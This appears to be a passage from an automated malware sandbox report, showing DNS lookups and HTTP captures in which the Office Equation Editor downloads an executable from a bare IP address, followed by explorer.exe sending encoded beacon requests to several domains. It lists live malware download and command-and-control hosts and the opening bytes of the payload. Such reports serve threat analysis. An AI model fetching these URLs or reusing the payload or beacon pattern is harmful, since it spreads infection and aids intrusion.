                                                                                                                                                                      Nov 26, 2020 21:17:47.682826042 CET8.8.8.8192.168.2.220x9e1cNo error (0)www.thejakx.compropage.beatstars.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Nov 26, 2020 21:17:47.682826042 CET8.8.8.8192.168.2.220x9e1cNo error (0)propage.beatstars.com52.206.159.80A (IP address)IN (0x0001)

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • 192.227.129.22
                                                                                                                                                                      • www.hostingbisniz.com
                                                                                                                                                                      • www.8no3.com
                                                                                                                                                                      • www.cna-notary.com
                                                                                                                                                                      • www.tennessyherb.com
                                                                                                                                                                      • www.bestpodstudio.com
                                                                                                                                                                      • www.xjcg168.com
                                                                                                                                                                      • www.pellatrap.net

                                                                                                                                                                      HTTP Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.2249165192.227.129.2280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2020 21:16:00.744925022 CET0OUTGET /vbc.exe HTTP/1.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                      Host: 192.227.129.22
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Nov 26, 2020 21:16:00.866168022 CET1INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 27 Nov 2020 03:15:59 GMT
                                                                                                                                                                      Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                      Last-Modified: Thu, 26 Nov 2020 22:38:57 GMT
                                                                                                                                                                      ETag: "7dc00-5b50a35a0744f"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Length: 515072
                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1c ca bf 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 07 00 00 0a 00 00 00 00 00 00 d6 ee 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 ee 07 00 4f 00 00 00 00 00 08 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c cf 07 00 00 20 00 00 00 d0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 00 08 00 00 08 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 da 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ee 07 00 00 00 00 00 48 00 00 00 02 00 05 00 48 9a 00 00 94 85 00 00 03 00 00 00 8c 00 00 06 dc 1f 01 00 a8 ce 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 9a 02 73 19 00 00 0a 7d 07 00 00 04 02 7e 1a 00 00 0a 7d 08 00 00 04 02 28 1b 00 00 0a 00 00 02 28 07 00 00 06 00 2a 1b 30 01 00 14 00 00 00 00 00 00 00 00 00 02 28 08 00 00 06 00 de 08 02 28 0f 00 00 0a 00 dc 2a 01 10 00 00 02 00 01 00 0a 0b 00 08 00 00 00 00 13 30 05 00 34 00 00 00 02 00 00 11 00 72 01 00 00 70 28 0d 00 00 06 0a 02 02 fe 06 09 00 00 06 73 c2 00 00 06 7d 01 00 00 04 02 1f 0d 02 7b 01 00 00 04 06 16 28 0a 00 00 06 7d 08 00 00 04 2a 3a 00 02 7b 08 00 00 04 28 0b 00 00 06 26 2a 00 13 30 04 00 c0 00 00 00 03 00 00 11 00 03 16 fe 04 16 fe 01 0a 06 39 9c 00 00 00 00
                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_0 @ @@O H.text `.rsrc@@.reloc @BHH0){(t|(+3*0){(t|(+3*0){(t|(+3*0){(t|(+3*s}~}((*0((*04rp(s}{(}*:{(&*09


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      1192.168.2.2249166209.126.13.15180C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2020 21:16:48.440181971 CET535OUTGET /mz59/?rFN0=Xrx4qn&u2M0SF6h=OW9WwwQcQ8ztOX5YgXZ2qNcRwznn7rmsJyX42Vrsm3RiMqRsS0WcEJSAu/B+R53MEk5Vww== HTTP/1.1
                                                                                                                                                                      Host: www.hostingbisniz.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 26, 2020 21:16:48.929755926 CET535INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Connection: close
                                                                                                                                                                      X-Powered-By: PHP/7.2.33
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                      X-Redirect-By: WordPress
                                                                                                                                                                      Location: https://www.hostingbisniz.com/mz59/?rFN0=Xrx4qn&u2M0SF6h=OW9WwwQcQ8ztOX5YgXZ2qNcRwznn7rmsJyX42Vrsm3RiMqRsS0WcEJSAu/B+R53MEk5Vww==
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Date: Thu, 26 Nov 2020 20:16:48 GMT
                                                                                                                                                                      Server: LiteSpeed


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      2192.168.2.2249167156.235.143.680C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2020 21:16:54.608463049 CET536OUTGET /mz59/?u2M0SF6h=6o65y5aQ3K5IIOIZSpB7cm3zMzY8A11b3Xh1T1GzD81isrOpTqP8VmdELK0Vgou9N3EQzw==&rFN0=Xrx4qn HTTP/1.1
                                                                                                                                                                      Host: www.8no3.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 26, 2020 21:16:55.174544096 CET537INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 26 Nov 2020 20:16:54 GMT
                                                                                                                                                                      Server: Apache
                                                                                                                                                                      Upgrade: h2
                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                                                                                      Data Raw: 31 35 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 6b 68 6f 77 74 2e 63 6f 6d 2f 78 71 69 61 6e 67 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 72 65 6c 3d 22 65 78 74 65 72 6e 61 6c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 3c 61 20 68 72 65 66 3d 27 2f 27 3e e6 ac a7 e5 ae 9d e4 bd 93 e8 82 b2 3c 2f 61 3e 3c 2f 68 31 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 7a 35 39 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 152<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title><script src="http://khowt.com/xqiang.js" type="text/javascript" rel="external nofollow"></script> </head><body><h1><a href='/'></a></h1><h1>Not Found</h1><p>The requested URL /mz59/ was not found on this server.</p></body></html>0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      3192.168.2.2249168184.168.131.24180C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2020 21:17:00.401149988 CET537OUTGET /mz59/?rFN0=Xrx4qn&u2M0SF6h=2h5hbT8wvHGvzmy0HBHdrVji2gh81Syn3N+I4+PuKAlq7cZqA7t6XPE7i2q+Hmh3HpIQwA== HTTP/1.1
                                                                                                                                                                      Host: www.cna-notary.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 26, 2020 21:17:00.610135078 CET538INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                                                      Date: Thu, 26 Nov 2020 20:17:00 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Location: https://www.facebook.com/CNA-Notary-106238414638500/publishing_tools/?refSource=pages_manager_bar
                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      4192.168.2.224916923.227.38.7480C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2020 21:17:20.869579077 CET540OUTGET /mz59/?u2M0SF6h=DnU1EkBat3Hivgbf1+4PHnhz+o7EzLkrjQo0TNQNOtieRb0aWO5zv8QtAyN+qW28k6DlMA==&rFN0=Xrx4qn HTTP/1.1
                                                                                                                                                                      Host: www.tennessyherb.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 26, 2020 21:17:21.088021040 CET541INHTTP/1.1 403 Forbidden
                                                                                                                                                                      Date: Thu, 26 Nov 2020 20:17:21 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      X-Sorting-Hat-PodId: 151
                                                                                                                                                                      X-Sorting-Hat-ShopId: 46403911832
                                                                                                                                                                      X-Dc: gcp-us-central1
                                                                                                                                                                      X-Request-ID: 9c532ece-10f9-4959-a97a-782aa8c8f781
                                                                                                                                                                      X-Download-Options: noopen
                                                                                                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      cf-request-id: 06a7cd1bec0000c290c83e0000000001
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 5f864ad97d91c290-FRA
                                                                                                                                                                      Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74
                                                                                                                                                                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-it


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      5192.168.2.224917067.195.197.2580C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2020 21:17:26.564904928 CET547OUTGET /mz59/?rFN0=Xrx4qn&u2M0SF6h=z/+6kJk1ZiQzz1nPj4QpXoSyzw+77qJSyU9yqVlYEeNMvKLM5SL/kyHjrXfbl0j4G8KzAg== HTTP/1.1
                                                                                                                                                                      Host: www.bestpodstudio.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 26, 2020 21:17:26.764904022 CET547INHTTP/1.1 400 Bad Request
                                                                                                                                                                      Date: Thu, 26 Nov 2020 20:17:26 GMT
                                                                                                                                                                      P3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Content-Length: 138
                                                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                      Age: 0
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Server: ATS/7.1.2
                                                                                                                                                                      Data Raw: 3c 68 31 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 23 34 39 37 41 39 37 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 27 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 0a 3c 21 2d 2d 20 70 31 31 77 35 2e 67 65 6f 2e 62 66 31 2e 79 61 68 6f 6f 2e 63 6f 6d 20 54 68 75 20 4e 6f 76 20 32 36 20 31 32 3a 31 37 3a 32 36 20 50 53 54 20 32 30 32 30 20 2d 2d 3e 0a
                                                                                                                                                                      Data Ascii: <h1 style='color:#497A97;font-size:12pt;font-weight:bold'>400 - Bad Request... p11w5.geo.bf1.yahoo.com Thu Nov 26 12:17:26 PST 2020 -->


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      6192.168.2.2249171102.141.201.7080C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2020 21:17:32.031821966 CET548OUTGET /mz59/?u2M0SF6h=OYXdaeXg9F3JN4qYjwOEDyjla/tUwsNCNX4C8lXWM8yJouL0vi1vAZ6NQlgRanHRrjTU7w==&rFN0=Xrx4qn HTTP/1.1
                                                                                                                                                                      Host: www.xjcg168.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 26, 2020 21:17:32.230328083 CET548INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Server: Microsoft-IIS/7.5
                                                                                                                                                                      Date: Thu, 26 Nov 2020 20:17:32 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 57
                                                                                                                                                                      Data Raw: e6 97 a0 e6 b3 95 e6 98 be e7 a4 ba e9 a1 b5 e9 9d a2 ef bc 8c e5 9b a0 e4 b8 ba e5 8f 91 e7 94 9f e5 86 85 e9 83 a8 e6 9c 8d e5 8a a1 e5 99 a8 e9 94 99 e8 af af e3 80 82
                                                                                                                                                                      Data Ascii:


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      7192.168.2.224917274.208.236.6180C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2020 21:17:42.485991955 CET549OUTGET /mz59/?u2M0SF6h=DyvGskzBclCbgEHOjTp+IehUzdGnZKMlyQnRi93amGKEFkS3cbEvMjPLMaYESsyOmM8Qkw==&rFN0=Xrx4qn HTTP/1.1
                                                                                                                                                                      Host: www.pellatrap.net
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 26, 2020 21:17:42.628258944 CET550INHTTP/1.1 404 Not Found
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 1364
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Date: Thu, 26 Nov 2020 20:17:42 GMT
                                                                                                                                                                      Server: Apache
                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63
